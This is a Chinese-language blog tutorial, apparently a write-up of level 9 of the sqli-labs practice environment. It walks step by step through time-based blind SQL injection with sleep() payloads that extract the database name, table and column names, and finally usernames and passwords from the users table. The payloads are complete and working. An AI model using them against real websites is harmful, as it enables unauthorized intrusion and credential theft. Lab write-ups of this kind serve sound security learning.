当前位置: 首页 > news >正文

sqli-labs-master第九关

news 2026/3/26 17:13:15

1、寻找注入点

1’ and 1=1--+

1’ and 1=2--+

页面只显示 You are in..... 无回显位判断为时间盲注

2、注入数据库

爆破库长

?id=1' and if(length(database())>7, sleep(5), 1) --+

根据库名长度爆库名

?id=1' and if(ascii(substr(database(),1,1))=115, sleep(5), 1) --+

标蓝部分的为1到8(库名长度)

3. 爆数据表数量

?id=1' and if((select COUNT(table_name) from information_schema.tables where table_schema=database())>2, sleep(5), 1) --+

4.爆数据表名长度

?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>2, sleep(5), 1) --+

5.根据表名长度爆表名

# 表一第1位字符(判断ASCII码>97)

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97, sleep(5), 1) --+

表一的第一个字段为e表二的第一个字段为r

表三和四的第一个字段为u可能为users表重点关注最后发现表四是users表

6.根据users表爆数据列数量

?id=1' and if((select COUNT(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3, sleep(5), 1) --+

Users中有三个字段

7.爆数据列名长度

?id=1' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))>2, sleep(5), 1) --+

8.根据列名长度爆列名

# 判断ASCII码>97

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))>97, sleep(5), 1) --+

# 判断字符='a'(推荐用ASCII码=97更稳定)

?id=1' and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)='a', sleep(5), 1) --+

# 适配id列(第1位字符i=105)

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=105, sleep(5), 1) --+

最终得到users的三个字段名id,username,password

9.根据列名爆数据值

获取用户名和密码信息

# 用户名第1位ASCII码>97

?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>97, sleep(5), 1) --+

# 密码第1位ASCII码>97

?id=1' and if(ascii(substr((select password from users limit 0,1),1,1))>97, sleep(5), 1) --+

# 用户名第1位='D'(D的ASCII码=68,推荐用ASCII码判断)

?id=1' and if(substr((select username from users limit 0,1),1,1)='D', sleep(5), 1) --+

http://www.jsqmd.com/news/439561/

相关文章:

  • 滋补品金银制品邮票手表上门回收,闲置珍品快速变现 - 品牌排行榜单
  • 白刚玉喷砂整套方案最新科普测评:设备+磨料+喷枪一步到位 - 深度智识库
  • 2026年GEO优化公司精选:五家全国性服务商表现参考 - 品牌2026
  • 超声波焊接设备市场迎爆发,这家国产龙头凭硬实力领跑行业 - 品牌推荐大师1
  • sqli-labs-master第八关
  • 2026年3月彩石瓦厂家推荐:聚焦企业综合实力与核心竞争力 - 品牌鉴赏师
  • 2026实验台、实验室装修改造厂家推荐:聚焦场景需求与专业能力 - 深度智识库
  • PbootCms网站内页打不开的常见情况汇总
  • 2026年软文发在哪儿效果好?这份热门软文营销平台推荐清单请收好! - 资讯焦点
  • 关系型数据库vs非关系型数据库,一文搞懂数据库的类型
  • 2026总结:西安活动策划服务怎么选?专业测评来支招 TOP5 口碑榜单,平台评分背书 - 深度智识库
  • 2026南京装修公司口碑榜单发布:冠诚装饰以9.99分蝉联本土透明家装标杆 - 资讯焦点
  • windows使用某个软件的时候使其自动化操作
  • 34、街道抽奖游戏
  • 2026年广东养老优质机构推荐,祥和养老院服务超贴心 - mypinpai
  • 【学习笔记】Bitset
  • MYSQL基础(大模型基础准备1/3)
  • 2026年武汉优秀的圆瓶贴标机,双面贴标机,全自动贴标机厂家品牌实力推荐榜 - 品牌鉴赏师
  • 2026北京美国留学中介费一览,附收费标准与避坑全攻略! - 资讯焦点
  • 2026 吾爱破解【春节】解题领红包之六 Windows 中级题
  • 康博:四十余年羽绒积淀下的战略突围 —— 从行业标杆到轻量化生活方式品牌的破圈之路 - 博客万
  • 2026年四川弹簧/机械弹簧/压簧/拉簧/扭簧/高强度弹簧/耐磨弹簧/重型弹簧/工业弹簧/精密弹簧品牌综合实力评估与选型推荐报告 - 2026年企业推荐榜
  • 超级签名和ios企业签名的区别,怎么选
  • 2026年GEO优化服务商怎么选?五大维度对比与选型指南 - 品牌2026
  • CTF网络安全题库大整理:刷题必备资源,附常见解题思路(建议收藏)
  • 不同类别洁面产品怎么选?根据肤质选择产品,实测好用不踩雷 - 资讯焦点
  • 总结保安员照片回执自己怎么弄,照豆在广州排名咋样? - 工业品牌热点
  • 详细介绍:《 Linux 修炼全景指南: 十五 》从 open 到重定向:一文吃透 Linux 文件 I/O(新手必读)
  • Linux在网络安全领域的地位与作用:零基础入门指南,一篇看懂!
  • 靠谱的电竞酒店联营合作是怎样的,费用一般多少钱? - myqiye